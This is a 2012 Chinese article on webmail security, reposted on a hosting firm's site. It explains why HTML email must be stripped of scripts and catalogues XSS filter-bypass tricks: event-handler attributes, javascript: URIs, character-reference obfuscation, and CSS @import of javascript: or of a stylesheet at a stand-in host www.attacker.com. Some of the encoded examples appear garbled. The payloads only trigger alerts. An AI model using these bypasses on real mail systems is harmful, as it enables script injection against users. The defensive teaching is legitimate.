Webmail攻防实战(4)
作者 佚名技术
来源 服务器技术
浏览
发布时间 2012-07-04
鉴于脚本程序可能带来的危险,WebMail系统完全有必要禁止HTML邮件中的脚本程序。禁止脚本程序的基本做法就是过滤掉html源程序中能够使脚本程序运行的代码,如script元素等,在这方面做的最好的莫过于hotmail了。下面是些常见的绕过脚本程序过滤的方法,不少的WebMail系统仍然没有完全改正: (1) 在html语言里,除了script元素内的或在script元素内引入的脚本程序能在html页面装载时被运行外,使用事件属性也能调用脚本程序运行,事件属性在JavaScript语言里被称为事件句柄,用于对页面上的某个特定事件(如鼠标点击、表单提交)做出响应,驱动Javascript程序运行。它的语法如下: <tag attribute1 attribute2 onEventName="javascript code;"> 例如: <body onload="alert(''JavaScript#1 is executed'');"> <a href="http://www.blue1000.com/article/#" onclick="alert(''JavaScript#2 is executed'');">Click here</a> <form method="post" action="#" onsubmit="alert(''JavaScript#3 is executed'');"> <input type="submit" value="Submit"> </form> </body> (2) URI(Universal Resource Identifier:通用资源标识)用于定位Internet上每种可用的资源,如HTML文档、图像、声音等。浏览器根据URI的资源类型(URI scheme)调用相应的程序操作该资源,如果把一些元素的URI属性值的资源类型设为javascript,则能够调用javascript程序运行。语法如下,注意要用“;”分隔不同的javascript语句: <tag attribute="javascript:javascript-code;"> 例如: <body background="javascript:alert(''JavaScript#1 is executed'');"> <a href="javascript:alert(''JavaScript#2 is executed'');">Click here</a> <form method="post" action="javascript:alert(''JavaScript#3 is executed'');"> <input type="submit" value="Submit"> </form> <img src="javascript:alert(''JavaScript#4 is executed'');"> </body> (3) 由于软硬件或其他原因,一些冷僻或特殊的字符不能输入或正确显示在html页面上,为了解决这个问题,html中可以使用SGML字符参考。字符参考是一种用来指定文档字符集中任何字符的独立编码机制,以“&”开始,以“;”结束。字符参考有两种表达方式:数字字符参考和实体字符参考。数字字符参考的语法为“D;”(D代表一个十进制数),或“H;”、“H;”(H代表一个十六进制数),例如“A;”、“A;”表示字母“A”,“水;”、“水;”表示汉字“水”。 攻击者把html语句里的一些字符以数字字符参考来代替,这样能避开WebMail系统对脚本程序的过滤。需要注意的是,元素和属性不可以用字符参考表示,例如: <body> <img lowsrc="ja;vasC;ript:alert(''JavaScript#1 is executed'')"> <a href="j;avA;sC;ript:;aler;t(''JavaScript#2 i;s executed'')">Click here;</a> <form method="post" action="javascript:alert(''JavaScript#3 is executed'')"> <input type="S;ubmit" value="Submit"> </form> </body> (4) 样式表是层叠样式表单(CSS:Cascading Style Sheet)的简称,用于控制、增强或统一网页上的样式(如字体、颜色等),它能够将样式信息与网页内容相分离,在html语言的style标签内可以用@import声明输入一个样式表。但是,如果输入的资源类型或内容是javascript,Internet Explorer浏览器仍然会执行。 例如: <style type="text/css"> <!-- @import url(javascript:alert(''JavaScript#1 is executed'')); @import url(http://www.attacker.com/js.css); --> </style> 其中http://www.attacker.com/js.css的内容如下所示: @import url(javascript:alert(''JavaScript#2 is executed'')); @import url(javascript:eval(String.fromCharCode (97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97, 108,101,114,116,40,39,84,101,115,116,32,50,39,41,59))); 能够绕过WebMail系统对脚本程序过滤的方法远不止上面所说的这些,例如曾有人发现把“<script>”标签改成“<_a<script>”和“<<script>”的样子能绕过yahoo电邮的过滤,这个漏洞yahoo在最近才改正过来。 关键词: |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: 利用twig架设WebMail系统(6)下一篇: 利用twig架设WebMail系统(5)
关于Webmail攻防实战(4)的所有评论